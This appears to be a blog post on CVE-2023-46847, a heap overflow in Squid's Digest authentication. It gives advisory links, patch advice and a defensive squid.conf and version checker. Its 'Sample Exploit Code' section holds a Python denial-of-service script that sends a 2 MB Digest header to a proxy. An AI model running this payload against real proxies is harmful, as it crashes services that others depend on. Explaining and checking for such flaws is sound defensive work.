Introduction
In October 2023, a critical vulnerability was discovered in Squid, the popular open-source proxy server and web cache. This vulnerability—CVE-2023-46847—opens the door for remote attackers to cause a Denial of Service (DoS) or potentially other harmful side effects. When Squid is configured to use HTTP Digest Authentication, attackers can exploit a buffer overflow and write up to 2 MB of arbitrary data into system memory. This post unpacks how this flaw works, how to reproduce it, and what you can do to protect your systems.
What Is Squid and Why Is This Serious?
Squid acts as a middleman between clients and servers—saving bandwidth and speeding up connections. Many businesses and ISPs use it to protect and control web usage.
A vulnerability in such a central application puts a lot at risk. The bug in question lets anyone on the internet send special HTTP requests and seriously destabilize your Squid server—or perhaps do even worse.
Impact: Up to 2MB of attacker-controlled data written to the heap
Official advisory:
https://github.com/squid-cache/squid/security/advisories/GHSA-7grc-j368-6q5f
https://github.com/squid-cache/squid/commit/c4e8c8aaed6b595eb01ae441cddffd159e45c5a3
How Does the Exploit Work?
When Squid is set up to use HTTP Digest Authentication, it must parse special headers (Proxy-Authorization: Digest ...) from incoming HTTP requests.
The vulnerable code, found in the function handling HTTP Digest, does not properly limit the size of input written to a memory buffer. This means an attacker can send a crafted header and overflow the buffer—corrupting memory.
The Squid process tries to parse the header, but ends up overwriting up to 2MB of heap memory.
Even if the attack does not immediately lead to code execution, Denial of Service is guaranteed: once the heap is smashed, Squid crashes or becomes unstable.
Sample Exploit Code
Below is a simplified Python script that demonstrates the Denial of Service vector. This will crash vulnerable Squid proxies configured with HTTP Digest authentication:
import socket

def dos_squid(target_host, target_port=3128):
    # Craft a large Digest header
    digest_value = 'A' * (2 * 1024 * 1024)  # 2MB of data
    request = (
        "GET http://example.com/ HTTP/1.1\r\n"
        "Host: example.com\r\n"
        f"Proxy-Authorization: Digest {digest_value}\r\n"
        "Connection: close\r\n\r\n"
    )
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_host, target_port))
    s.sendall(request.encode())
    s.close()
    print(f"Sent DoS payload to {target_host}:{target_port}")

if __name__ == "__main__":
    dos_squid("YOUR_SQUID_SERVER_IP_OR_HOST")
Warning:
This code is for educational and defensive purposes only. Do not use it against systems you don't own or have permission to test.
Check this section in your squid.conf
auth_param digest program /usr/lib/squid3/digest_pw_auth ...
If it’s there, and your version is affected, you’re vulnerable.
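One way to run this check offline, as an added example (not code from the original post or the Squid project): it looks for an active `auth_param digest program` directive and compares the version line printed by `squid -v` against the 6.5 fix release named in this post. The sample configuration, its file paths, the status strings and the function names are constructed for illustration; matching the scheme name case-insensitively and honouring backslash line continuation are defensive assumptions.

```python
import re

FIXED_VERSION = (6, 5)  # per the post: Squid 6.5 or later mitigates the issue

# Constructed sample inputs (not taken from a real host).
SAMPLE_CONF = """\
# auth_param digest program /usr/lib/squid3/digest_pw_auth /etc/squid/old
http_port 3128
auth_param basic program /usr/lib/squid3/basic_ncsa_auth /etc/squid/passwd
auth_param Digest program \\
    /usr/lib/squid3/digest_pw_auth /etc/squid/digest_passwd
auth_param digest realm proxy
"""
SAMPLE_VERSION = "Squid Cache: Version 6.4\nService Name: squid\n"

def active_directives(conf_text):
    """Yield (first_line_no, tokens) for every non-comment directive."""
    pending, start = "", 0
    for no, raw in enumerate(conf_text.splitlines(), 1):
        if not pending:
            start = no
        line = raw.split("#", 1)[0].rstrip()   # simplified comment handling
        if line.endswith("\\"):                # directive continues on next line
            pending += line[:-1] + " "
            continue
        tokens = (pending + line).split()
        pending = ""
        if tokens:
            yield start, tokens

def digest_auth_lines(conf_text):
    """Return (line_no, directive) for each active Digest helper definition."""
    return [(no, " ".join(t)) for no, t in active_directives(conf_text)
            if len(t) >= 3 and t[0] == "auth_param"
            and t[1].lower() == "digest" and t[2] == "program"]

def assess(conf_text, squid_v_output):
    """Classify a host from its squid.conf text and `squid -v` output."""
    if not digest_auth_lines(conf_text):
        return "not-configured"
    m = re.search(r"Version (\d+)\.(\d+)", squid_v_output)
    if m is None:
        return "unknown-version"
    version = (int(m.group(1)), int(m.group(2)))
    return "patched" if version >= FIXED_VERSION else "exposed"

if __name__ == "__main__":
    print(digest_auth_lines(SAMPLE_CONF), assess(SAMPLE_CONF, SAMPLE_VERSION))
```

Files pulled in through `include` directives need the same check, and a distribution package carrying a backported fix still reports its older version number, so confirm an "exposed" result against the vendor's changelog.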
Responsible Disclosure and Patching
The maintainers have published a patch; upgrading to Squid 6.5 or later fully mitigates the issue.
- Official Patch Commit
- Squid Security Advisory
To fix:
Conclusion
CVE-2023-46847 is a wake-up call for anyone running internet-facing Squid proxies with HTTP Digest authentication enabled. Attackers can easily crash your proxy with a simple request, and more advanced exploits may emerge. Patch and harden your systems now to avoid downtime or intrusion.
Further Reading
- Official Security Advisory
- Patch Commit
- NVD Entry for CVE-2023-46847
Timeline
Published on: 11/03/2023 08:15:08 UTC
Last modified on: 11/20/2023 16:15:08 UTC